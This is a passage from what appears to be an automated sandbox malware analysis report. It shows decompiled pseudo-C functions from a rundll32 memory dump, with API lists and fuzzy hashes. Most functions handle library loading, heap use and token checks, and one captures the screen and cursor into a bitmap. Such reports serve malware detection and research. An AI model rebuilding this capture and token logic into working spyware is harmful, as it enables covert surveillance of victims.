              • Part of subcall function 0445F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,0446CA88,?,0445663F,?), ref: 0445F0FB
            • GetFileAttributesW.KERNELBASE(00000000), ref: 04456655
            • CreateThread.KERNELBASE(00000000,00000000,044563A2,00000000,00000000,?), ref: 044566DC
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: f236f2f131575b69b610e26f762e4228b3fea23ad036df5a249051e8b155047f
            • Instruction ID: c57a36d6a906f67b43dfe9ebfc95864f940f3889767ebbff9139b8b91166cd87
            • Opcode Fuzzy Hash: f236f2f131575b69b610e26f762e4228b3fea23ad036df5a249051e8b155047f
            • Instruction Fuzzy Hash: 9C214F71604205EBEF04BFB5E804A6E37E4AB04314F51856FE95ACA2A2DF78E8448B12
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445F0D9 Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 329 445f0d9-445f0f9 call 4459f6b 332 445f103-445f108 LoadLibraryA 329->332 333 445f0fb-445f101 GetModuleHandleA 329->333 334 445f10a-445f10c 332->334 333->334 335 445f10e-445f113 call 445f08e 334->335 336 445f11b-445f129 call 4458d87 334->336 339 445f118-445f119 335->339 339->336
            C-Code - Quality: 47%
            			E0445F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E04459F6B(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf2e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0445F08E(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E04458D87( &_v8);
				return _t25;
			}










            0x0445f0dc
            0x0445f0df
            0x0445f0e5
            0x0445f0e7
            0x0445f0ec
            0x0445f0ee
            0x0445f0f8
            0x0445f0f9
            0x0445f108
            0x0445f0fb
            0x0445f0fb
            0x0445f0fb
            0x0445f10c
            0x0445f113
            0x0445f119
            0x0445f119
            0x0445f11e
            0x0445f129

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,0446CA88,?,0445663F,?), ref: 0445F0FB
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,0446CA88,?,0445663F,?), ref: 0445F108
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: 1a6db5d79649b042a6937c0c88f4787a36f178e0a75c43aa34fcd28d270916d3
            • Instruction ID: cc3e960d1f9b9b741236dd3398b91574cffec263e8ad8d4953d83fbeb0921164
            • Opcode Fuzzy Hash: 1a6db5d79649b042a6937c0c88f4787a36f178e0a75c43aa34fcd28d270916d3
            • Instruction Fuzzy Hash: CFF0A772304114EBEF14BBA9E84485AB3EDDF88696714413BF806D7262DEB0AD458791
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445CA5A Relevance: 1.6, APIs: 1, Instructions: 82COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 341 445ca5a-445ca79 call 445c92f 344 445cb14-445cb17 341->344 345 445ca7f-445ca96 call 445c986 341->345 348 445caf6-445cb04 FindCloseChangeNotification 345->348 349 445ca98-445cab9 345->349 350 445cb06-445cb11 call 4458ddf 348->350 351 445cb12 348->351 349->348 354 445cabb-445cabd 349->354 350->351 351->344 356 445cabf-445cac2 354->356 357 445cae9-445caf4 354->357 358 445cac5-445cad4 356->358 357->348 361 445cae6-445cae8 358->361 362 445cad6-445cae2 358->362 361->357 362->358 363 445cae4 362->363 363->357
            C-Code - Quality: 47%
            			E0445CA5A(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E0445C92F(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E0445C986(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E04458DDF( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x446f8d8; // 0x450fab0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x446f8d8; // 0x450fab0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x446f8d8; // 0x450fab0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















            0x0445ca61
            0x0445ca63
            0x0445ca6a
            0x0445ca6c
            0x0445ca6f
            0x0445ca74
            0x0445ca79
            0x0445ca83
            0x0445ca86
            0x0445ca89
            0x0445ca8e
            0x0445ca90
            0x0445ca96
            0x0445caf6
            0x0445cafe
            0x0445cb04
            0x0445cb0b
            0x0445cb11
            0x00000000
            0x0445cb12
            0x0445ca9b
            0x0445ca9c
            0x0445ca9d
            0x0445ca9e
            0x0445ca9f
            0x0445caa0
            0x0445caa1
            0x0445caa2
            0x0445caa7
            0x0445caa9
            0x0445caae
            0x0445caaf
            0x0445cab9
            0x00000000
            0x00000000
            0x0445cabd
            0x0445cae9
            0x0445cae9
            0x0445caf1
            0x0445caf4
            0x00000000
            0x0445caf4
            0x0445cabf
            0x0445cabf
            0x0445cac2
            0x0445cac5
            0x0445cac5
            0x0445cac8
            0x0445caca
            0x0445cad4
            0x00000000
            0x00000000
            0x0445cad9
            0x0445cada
            0x0445cadd
            0x0445cae2
            0x00000000
            0x00000000
            0x00000000
            0x0445cae4
            0x0445cae8
            0x00000000
            0x0445cae8
            0x0445cb17

            APIs
              • Part of subcall function 0445C92F: GetCurrentThread.KERNEL32 ref: 0445C942
              • Part of subcall function 0445C92F: OpenThreadToken.ADVAPI32(00000000,?,?,0445CA74,00000000,04450000), ref: 0445C949
              • Part of subcall function 0445C92F: GetLastError.KERNEL32(?,?,0445CA74,00000000,04450000), ref: 0445C950
              • Part of subcall function 0445C92F: OpenProcessToken.ADVAPI32(00000000,?,?,0445CA74,00000000,04450000), ref: 0445C975
              • Part of subcall function 0445C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04450000,00000000,00000000,?,0445CA07,00000000,00000000,?,0445CA30), ref: 0445C9A1
              • Part of subcall function 0445C986: GetLastError.KERNEL32(?,0445CA07,00000000,00000000,?,0445CA30,00001644,?,0445E053), ref: 0445C9A8
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04450000), ref: 0445CAFE
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
            • String ID:
            • API String ID: 1806447117-0
            • Opcode ID: fbf788930c8daedbc6b66dbad7912fd628bc2527772d38ab23d696f8fe31672b
            • Instruction ID: 10476b5604fd2f437acf68dca658e7c7a262ac830d8ff73bd966002d5688444d
            • Opcode Fuzzy Hash: fbf788930c8daedbc6b66dbad7912fd628bc2527772d38ab23d696f8fe31672b
            • Instruction Fuzzy Hash: E7213D31A04305AFDF10DFA9E885AAEBBF8EF44700F10446AE945E7262E730AD458B90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044563A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 364 44563a2-44563bb call 445651e GetOEMCP call 445dfc2 369 44563c0-44563eb call 4463c36 364->369 370 44563bd-44563be 364->370 374 44563f5-44563fb call 445d889 369->374 375 44563ed-44563f3 369->375 371 4456435 370->371 380 4456400-4456407 374->380 376 445640f-445641b 375->376 378 445642d call 4453597 376->378 379 445641d-4456422 call 44561e8 376->379 386 4456432-4456434 378->386 379->386 381 4456424-445642b 380->381 382 4456409 380->382 381->378 381->386 382->376 386->371
            C-Code - Quality: 100%
            			E044563A2(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E0445651E();
				GetOEMCP();
				_t13 = E0445DFC2(__fp0); // executed
				 *0x446f8d4 = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x446f8d4; // 0x450fc00
					_t2 = _t14 + 0x224; // 0x4450000
					E04463C36( *_t2);
					_t26 =  *0x446f8d4; // 0x450fc00
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x4450000, executed
						_t26 =  *_t7;
						_t16 = E0445D889( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x446f8d4; // 0x450fc00
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E04453597();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x446f8d4; // 0x450fc00
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E044561E8(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











            0x044563a2
            0x044563a2
            0x044563a7
            0x044563ae
            0x044563b3
            0x044563bb
            0x044563c4
            0x044563ca
            0x044563cf
            0x044563d5
            0x044563da
            0x044563e0
            0x044563e1
            0x044563eb
            0x044563f5
            0x044563f5
            0x044563fb
            0x04456400
            0x04456402
            0x04456407
            0x04456424
            0x0445642b
            0x04456432
            0x04456432
            0x00000000
            0x04456434
            0x0445642d
            0x0445642d
            0x00000000
            0x0445642d
            0x04456409
            0x0445640f
            0x0445640f
            0x04456414
            0x0445641b
            0x00000000
            0x00000000
            0x0445641d
            0x00000000
            0x0445641d
            0x044563ed
            0x00000000
            0x044563ed
            0x00000000

            APIs
            • GetOEMCP.KERNEL32 ref: 044563A7
              • Part of subcall function 0445DFC2: GetCurrentProcessId.KERNEL32 ref: 0445DFE9
              • Part of subcall function 0445DFC2: GetLastError.KERNEL32 ref: 0445E0E3
              • Part of subcall function 0445DFC2: GetSystemMetrics.USER32(00001000), ref: 0445E0F3
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: 335593638ee1fad6692b72f46bf02759426e93283b178b845c017f66117483b0
            • Instruction ID: 9a1398ce0f7e402bd31668c1fbbf91c5da9255c901732fa9c2a403fb9058452a
            • Opcode Fuzzy Hash: 335593638ee1fad6692b72f46bf02759426e93283b178b845c017f66117483b0
            • Instruction Fuzzy Hash: E9015E71204252CFEF24EF68E5096A677E0FF46314F8A01BBE84C8A123D7306851CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445CA0A Relevance: 1.5, APIs: 1, Instructions: 34COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0445CA0A(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x446f8d8; // 0x450fab0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E0445C9F3(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x446f8d0; // 0x450f8c0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










            0x0445ca0e
            0x0445ca16
            0x0445ca1e
            0x0445ca23
            0x0445ca2b
            0x0445ca30
            0x0445ca34
            0x0445ca52
            0x0445ca55
            0x0445ca36
            0x0445ca39
            0x0445ca3b
            0x0445ca43
            0x0445ca43
            0x0445ca46
            0x0445ca46
            0x0445ca59
            0x0445ca26
            0x0445ca26
            0x0445ca26

            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d1ea367ee1c26522b66f21772b1fbc5a44e4777a019d2158a5fa93d7eed820fc
            • Instruction ID: 6871f0ec2038a3f7df09d4dcf947273f75f07c979b0f1ee4d3b1f3d01a2a3827
            • Opcode Fuzzy Hash: d1ea367ee1c26522b66f21772b1fbc5a44e4777a019d2158a5fa93d7eed820fc
            • Instruction Fuzzy Hash: 4DF01731A10614EFDF11DBA8D985A9E77F8FF04249F005096E901E7262D774EE00DB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04456438 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E04456438() {
				intOrPtr _t3;

				_t3 =  *0x446f8d0; // 0x450f8c0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x446f8f4, 0xffffffff);
				ExitProcess(0);
			}




            0x04456438
            0x04456445
            0x0445644f

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 0445644F
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 0bd37af94f0524c2f2552795de952f0f797be652a5bdac1de44b8146d4bf4a96
            • Instruction ID: 4490a212c08cb134eb81fa179888e197d5400fffab56738ff2745ddee23e8d23
            • Opcode Fuzzy Hash: 0bd37af94f0524c2f2552795de952f0f797be652a5bdac1de44b8146d4bf4a96
            • Instruction Fuzzy Hash: 59C01270304440DFE740AB64E908F1437E0FF08322F1982E2F16D8A1E8CB2488088B02
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04458DC9 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E04458DC9(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x446f9b8, 8, _a4); // executed
				return _t2;
			}




            0x04458dd7
            0x04458dde

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 17269b41a5182ee65f5036227fd3f0a4f5b109b46328507c33ad42c69ea4a416
            • Instruction ID: 96e7126b5b20090125ffab693b099e35a7a26c2f1ac43ada7e40290e609664fd
            • Opcode Fuzzy Hash: 17269b41a5182ee65f5036227fd3f0a4f5b109b46328507c33ad42c69ea4a416
            • Instruction Fuzzy Hash: B8B0923A084208FBEF411E81FC05A853F69EB08655F004010F648090618BB768699B82
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445DADC Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E0445DADC(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




            0x0445dae4
            0x0445daec
            0x0445daf1

            APIs
            • ResumeThread.KERNELBASE(?,0445D947,?,?,00000001), ref: 0445DAE4
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 3acca63354585d44aae84608fbd4e15867b04b41cfab8f44c81d7d129da6c9f5
            • Instruction ID: b41cbc810c511c6758d356603aab191fe6fa44ab0431dc3d45364e1680b88084
            • Opcode Fuzzy Hash: 3acca63354585d44aae84608fbd4e15867b04b41cfab8f44c81d7d129da6c9f5
            • Instruction Fuzzy Hash: E7B092322A04019BCB005B74E80A9A03BE0FB56606B98C2E4E049C6061C32EC8498B40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04458DB4 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E04458DB4() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x446f9b8 = _t1;
				return _t1;
			}




            0x04458dbd
            0x04458dc3
            0x04458dc8

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,04456616), ref: 04458DBD
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: 2034f623c668743850a3c556b9a3770bb95f6d29befaea3d3f06050e5ab44dce
            • Instruction ID: f8177a5c2b2a7b5b0896a6a9973297a2dce4caaf4620958f1c757ec5d1c90cc0
            • Opcode Fuzzy Hash: 2034f623c668743850a3c556b9a3770bb95f6d29befaea3d3f06050e5ab44dce
            • Instruction Fuzzy Hash: A9B012B0699300E6FF500F206C46B013510D344B06F200005F709581C0C7F414049516
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445DAF2 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 91%
            			E0445DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E0445A236(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









            0x0445daf5
            0x0445daf6
            0x0445daf9
            0x0445dafc
            0x0445db01
            0x0445db04
            0x0445db07
            0x0445db07
            0x0445db0f
            0x0445db14
            0x0445db17
            0x0445db1a
            0x0445db1d
            0x0445db20
            0x0445db33
            0x0445db34
            0x0445db37
            0x0445db3d
            0x0445db40
            0x0445db43
            0x00000000
            0x00000000
            0x0445db45
            0x00000000
            0x0445db43
            0x0445db49
            0x0445db49
            0x0445db4b
            0x0445db4b
            0x0445db4e
            0x0445db4e
            0x0445db53
            0x0445db5b
            0x0445db67

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 0445DB5B
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 5d4baf7ffef0f2d23b8abbc5e4d7336a83f51678581ecb8087fa9c0873d18652
            • Instruction ID: aae3917fa481d5ff35587fd5ba916a08ad4dd1c500f73564cb73e9268a6d2fd8
            • Opcode Fuzzy Hash: 5d4baf7ffef0f2d23b8abbc5e4d7336a83f51678581ecb8087fa9c0873d18652
            • Instruction Fuzzy Hash: 20113971A00205AFEF10CF99C484A9AB7F9EF45324F10C46AE95A9B311D370F941CB40
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 04455D1E Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 223windowCOMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E04455D1E(int* __ecx) {
				signed int _v8;
				char _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HDC__* _v28;
				void* _v32;
				int* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				signed int _v88;
				signed int _v92;
				struct tagBITMAPINFO _v96;
				intOrPtr _v102;
				int _v110;
				char _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				int _v156;
				signed int _v160;
				void _v164;
				int _t82;
				void* _t84;
				signed int _t92;
				void* _t99;
				char _t103;
				intOrPtr _t113;
				int* _t114;
				struct HDC__* _t120;
				signed int _t124;
				short _t137;
				struct HDC__* _t141;
				void* _t144;
				void* _t148;

				_v36 = __ecx;
				_v24 = 0;
				_t120 = 0;
				_v12 = 0;
				_t144 = 0;
				_v20 = 0;
				_t141 = GetDC(0);
				_v28 = _t141;
				if(_t141 != 0) {
					_t120 = CreateCompatibleDC(_t141);
					if(_t120 != 0) {
						_v8 = GetDeviceCaps(_t141, 8);
						_t82 = GetDeviceCaps(_t141, 0xa);
						_v16 = _t82;
						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
						if(_t144 != 0) {
							_t84 = SelectObject(_t120, _t144);
							_v32 = _t84;
							if(_t84 != 0) {
								_t144 = SelectObject(_t120, _v32);
								if(_t144 != 0) {
									GetObjectW(_t144, 0x18,  &_v164);
									_t92 = _v160;
									_t124 = _v156;
									_v92 = _t92;
									_v84 = 1;
									_t137 = 0x20;
									_v82 = _t137;
									_v96.bmiHeader = 0x28;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									asm("cdq");
									_v88 = _t124;
									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
									_t99 = E04458DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
									_v20 = _t99;
									if(_t99 != 0) {
										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
										_v16 = _v8 + 0x36;
										_t103 = E04458DC9(_v8 + 0x36);
										_v12 = _t103;
										if(_t103 != 0) {
											_v110 = _v16;
											_v112 = 0x4d42;
											_v102 = 0x36;
											E04458EA6(_t103,  &_v112, 0xe);
											E04458EA6(_v12 + 0xe,  &_v96, 0x28);
											E04458EA6(_v12 + 0x36, _v20, _v8);
											_t148 = _t148 + 0x24;
											_v8 = _v8 & 0x00000000;
											_t113 = E0445FBFB(_v12, _v16,  &_v8);
											_v24 = _t113;
											if(_t113 != 0) {
												_t114 = _v36;
												if(_t114 != 0) {
													 *_t114 = _v8;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E04458DDF( &_v20, 0);
				E04458DDF( &_v12, 0);
				if(_t120 != 0) {
					DeleteDC(_t120);
				}
				if(_t141 != 0) {
					DeleteDC(_t141);
				}
				if(_t144 != 0) {
					DeleteObject(_t144);
				}
				return _v24;
			}




















































            0x04455d2a
            0x04455d30
            0x04455d33
            0x04455d35
            0x04455d38
            0x04455d3a
            0x04455d43
            0x04455d45
            0x04455d4a
            0x04455d57
            0x04455d5b
            0x04455d6f
            0x04455d72
            0x04455d78
            0x04455d82
            0x04455d86
            0x04455d8e
            0x04455d94
            0x04455d99
            0x04455e2f
            0x04455e33
            0x04455e43
            0x04455e49
            0x04455e51
            0x04455e58
            0x04455e5b
            0x04455e64
            0x04455e65
            0x04455e6e
            0x04455e75
            0x04455e78
            0x04455e7b
            0x04455e7e
            0x04455e81
            0x04455e84
            0x04455e87
            0x04455e8b
            0x04455e9a
            0x04455e9d
            0x04455ea2
            0x04455ea8
            0x04455ebf
            0x04455ecc
            0x04455ecf
            0x04455ed4
            0x04455eda
            0x04455edf
            0x04455ee7
            0x04455ef2
            0x04455ef9
            0x04455f0e
            0x04455f23
            0x04455f31
            0x04455f34
            0x04455f39
            0x04455f3e
            0x04455f44
            0x04455f46
            0x04455f4b
            0x04455f50
            0x04455f50
            0x04455f4b
            0x04455f44
            0x04455eda
            0x04455ea8
            0x04455e33
            0x04455d99
            0x04455d86
            0x04455d5b
            0x04455f58
            0x04455f63
            0x04455f6d
            0x04455f70
            0x04455f70
            0x04455f78
            0x04455f7b
            0x04455f7b
            0x04455f83
            0x04455f86
            0x04455f86
            0x04455f93

            APIs
            • GetDC.USER32(00000000), ref: 04455D3D
            • CreateCompatibleDC.GDI32(00000000), ref: 04455D51
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 04455D6A
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 04455D72
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 04455D7C
            • SelectObject.GDI32(00000000,00000000), ref: 04455D8E
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 04455DB2
            • GetCursorInfo.USER32(?), ref: 04455DC3
            • CopyIcon.USER32 ref: 04455DD8
            • GetIconInfo.USER32(00000000,?), ref: 04455DE6
            • GetObjectW.GDI32(?,00000018,?), ref: 04455E04
            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 04455E1C
            • SelectObject.GDI32(00000000,?), ref: 04455E29
            • GetObjectW.GDI32(00000000,00000018,?), ref: 04455E43
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 04455EBF
            • DeleteDC.GDI32(00000000), ref: 04455F70
            • DeleteDC.GDI32(00000000), ref: 04455F7B
            • DeleteObject.GDI32(00000000), ref: 04455F86
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 782150a44cc4572bcf671fe433972f3c637e0d769979c139dd28502fc384ad7d
            • Instruction ID: 782e0f9d10b968459da91b888c70d561cf23bb0c0059c208ee807c2a9ade7053
            • Opcode Fuzzy Hash: 782150a44cc4572bcf671fe433972f3c637e0d769979c139dd28502fc384ad7d
            • Instruction Fuzzy Hash: 588109B1D00219BBEF14DFE5DC49BAEBBB8EF48304F10406AE904E7251EB749A058B61
            Uniqueness

            Uniqueness Score: -1.00%

